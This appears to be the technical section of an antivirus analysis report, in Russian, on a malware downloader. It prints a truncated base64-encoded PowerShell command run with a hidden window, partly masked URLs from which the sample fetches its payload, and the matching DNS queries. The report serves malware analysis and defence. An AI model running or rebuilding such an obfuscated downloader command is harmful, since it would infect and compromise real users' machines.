Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAEYAWQBQAEkAegBuAGQAPQAnAEMAVQBFAEYAQgB6AHoAeQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBVAFIASQBUAGAAeQBQAFIATwBgAFQATwBDAG8AbAAiACAAPQAgAC...
- http://we###ack.com.au/wp-includes/U890802/
- http://mx####erests.com/gulf/dhcWCM/
- http://mo###etech.net/images/TnpY/
- http://ro##web.com/sea/IOm310/
- http://sa####bbeyarts.com/SALLY_ART_2014/UqN4k/
- DNS ASK we###ack.com.au
- DNS ASK mx####erests.com
- DNS ASK mo###etech.net
- DNS ASK ro##web.com
- DNS ASK sa####bbeyarts.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAEYAWQBQAEkAegBuAGQAPQAnAEMAVQBFAEYAQgB6AHoAeQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBVAFIASQBUAGAAeQBQAFIATwBgAFQATwBDAG8AbAAiACAAPQAgAC...' (со скрытым окном)